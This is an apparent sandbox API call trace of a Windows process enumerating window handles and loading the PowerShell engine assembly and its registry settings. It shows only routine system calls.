	[0257.471] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.471] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x818
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x5b8
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x494
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x1ec
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x440
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x7e8
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x730
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x2c8
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x31c
	[0257.472] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x330
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x128
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x5c8
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x6f8
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x358
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x73c
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xb0
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x250
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x240
	[0257.473] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x790
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x61c
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x540
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x538
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x568
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x538
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x568
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x538
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x540
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x540
	[0257.474] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x510
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x57c
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x460
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x554
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x528
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.475] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x79c
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4e0
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x460
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x460
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x44c
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x778
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x460
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x558
	[0257.476] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4d0
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x7e0
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xa74
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x694
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xa28
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x9b0
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x8d8
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x940
	[0257.477] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x93c
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4ec
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x150
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x720
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x3c4
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x7d4
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x6c8
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xb54
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xb54
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xb5c
	[0257.478] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x838
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x818
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x5b8
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x494
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x1ec
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x440
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x7e8
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x730
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x2c8
	[0257.479] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x31c
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x330
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x128
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x5c8
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x6f8
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x358
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x73c
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0xb0
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x250
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x240
	[0257.480] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x790
	[0257.481] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x61c
	[0257.481] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x568
	[0257.481] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x538
	[0257.482] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x540
	[0257.483] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x510
	[0257.483] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x460
	[0257.483] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x79c
	[0257.483] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x4e0
	[0257.483] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x460
	[0257.483] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1ada20 | out: lpdwProcessId=0x1ada20) returned 0x778
	[0257.488] WerSetFlags () returned 0x0
	[0257.496] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0257.496] CoTaskMemFree (pv=0x0) 
	[0257.497] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1add88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1add80 | out: pulNumLanguages=0x1add88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1add80) returned 1
	[0257.498] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1add88, pwszLanguagesBuffer=0x2c5f8d8, pcchLanguagesBuffer=0x1add80 | out: pulNumLanguages=0x1add88, pwszLanguagesBuffer=0x2c5f8d8, pcchLanguagesBuffer=0x1add80) returned 1
	[0257.504] CoTaskMemAlloc (cb=0x24) returned 0x3dccb0
	[0257.504] GetUserDefaultLocaleName (in: lpLocaleName=0x3dccb0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0257.504] CoTaskMemFree (pv=0x3dccb0) 
	[0258.090] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0258.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.090] CoTaskMemFree (pv=0x3298d0) 
	[0258.093] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0258.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.093] CoTaskMemFree (pv=0x3298d0) 
	[0258.095] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0258.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.095] CoTaskMemFree (pv=0x3298d0) 
	[0258.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.106] SetErrorMode (uMode=0x1) returned 0x1
	[0258.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ada00 | out: lpFileInformation=0x1ada00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0258.106] SetErrorMode (uMode=0x1) returned 0x1
	[0258.107] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adc70 | out: lpdwHandle=0x1adc70) returned 0x94c
	[0258.527] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c63168 | out: lpData=0x2c63168) returned 1
	[0258.528] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adbe8, puLen=0x1adbe0 | out: lplpBuffer=0x1adbe8*=0x2c63204, puLen=0x1adbe0) returned 1
	[0258.528] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c632e0, puLen=0x1adb50) returned 1
	[0258.528] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0258.528] CoTaskMemAlloc (cb=0x2e) returned 0x3df250
	[0258.528] lstrcpyW (in: lpString1=0x3df250, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0258.528] CoTaskMemFree (pv=0x3df250) 
	[0258.528] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c63334, puLen=0x1adb50) returned 1
	[0258.528] lstrlenW (lpString="System.Management.Automation") returned 28
	[0258.528] CoTaskMemAlloc (cb=0x3c) returned 0x3e6c00
	[0258.528] lstrcpyW (in: lpString1=0x3e6c00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0258.528] CoTaskMemFree (pv=0x3e6c00) 
	[0258.529] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c63390, puLen=0x1adb50) returned 1
	[0258.529] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0258.529] CoTaskMemAlloc (cb=0x20) returned 0x3e3bc0
	[0258.529] lstrcpyW (in: lpString1=0x3e3bc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0258.529] CoTaskMemFree (pv=0x3e3bc0) 
	[0258.529] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c633d0, puLen=0x1adb50) returned 1
	[0258.529] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0258.529] CoTaskMemAlloc (cb=0x44) returned 0x3e6c00
	[0258.529] lstrcpyW (in: lpString1=0x3e6c00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0258.529] CoTaskMemFree (pv=0x3e6c00) 
	[0258.529] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c63438, puLen=0x1adb50) returned 1
	[0258.529] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0258.529] CoTaskMemAlloc (cb=0x76) returned 0x3799c0
	[0258.529] lstrcpyW (in: lpString1=0x3799c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0258.529] CoTaskMemFree (pv=0x3799c0) 
	[0258.529] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c634d4, puLen=0x1adb50) returned 1
	[0258.529] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0258.529] CoTaskMemAlloc (cb=0x44) returned 0x3e6c00
	[0258.529] lstrcpyW (in: lpString1=0x3e6c00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0258.529] CoTaskMemFree (pv=0x3e6c00) 
	[0258.529] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c63538, puLen=0x1adb50) returned 1
	[0258.529] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0258.529] CoTaskMemAlloc (cb=0x58) returned 0x393dc0
	[0258.529] lstrcpyW (in: lpString1=0x393dc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0258.529] CoTaskMemFree (pv=0x393dc0) 
	[0258.529] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c635b4, puLen=0x1adb50) returned 1
	[0258.529] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0258.529] CoTaskMemAlloc (cb=0x20) returned 0x3e3bc0
	[0258.530] lstrcpyW (in: lpString1=0x3e3bc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0258.530] CoTaskMemFree (pv=0x3e3bc0) 
	[0258.530] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x2c6325c, puLen=0x1adb50) returned 1
	[0258.530] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0258.530] CoTaskMemAlloc (cb=0x66) returned 0x3d8a60
	[0258.530] lstrcpyW (in: lpString1=0x3d8a60, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0258.530] CoTaskMemFree (pv=0x3d8a60) 
	[0258.530] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x0, puLen=0x1adb50) returned 0
	[0258.530] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x0, puLen=0x1adb50) returned 0
	[0258.530] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adb58, puLen=0x1adb50 | out: lplpBuffer=0x1adb58*=0x0, puLen=0x1adb50) returned 0
	[0258.530] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2c63204, puLen=0x1adb20) returned 1
	[0258.530] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0258.530] VerLanguageNameW (in: wLang=0x0, szLang=0x383920, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0258.530] CoTaskMemFree (pv=0x383920) 
	[0258.530] VerQueryValueW (in: pBlock=0x2c63168, lpSubBlock="\\", lplpBuffer=0x1adb78, puLen=0x1adb70 | out: lplpBuffer=0x1adb78*=0x2c63190, puLen=0x1adb70) returned 1
	[0258.536] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0258.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.536] CoTaskMemFree (pv=0x3298d0) 
	[0258.537] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0258.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.537] CoTaskMemFree (pv=0x3298d0) 
	[0258.538] lstrlenW (lpString="䅁") returned 1
	[0258.544] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ada48 | out: phkResult=0x1ada48*=0x300) returned 0x0
	[0258.545] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ada38 | out: phkResult=0x1ada38*=0x304) returned 0x0
	[0258.546] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adac8 | out: phkResult=0x1adac8*=0x308) returned 0x0
	[0258.548] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ada0c, lpData=0x0, lpcbData=0x1ada08*=0x0 | out: lpType=0x1ada0c*=0x1, lpData=0x0, lpcbData=0x1ada08*=0x56) returned 0x0
	[0258.549] CoTaskMemAlloc (cb=0x5a) returned 0x3d89f0
	[0258.549] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad9dc, lpData=0x3d89f0, lpcbData=0x1ad9d8*=0x56 | out: lpType=0x1ad9dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad9d8*=0x56) returned 0x0
	[0258.549] CoTaskMemFree (pv=0x3d89f0) 
	[0258.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
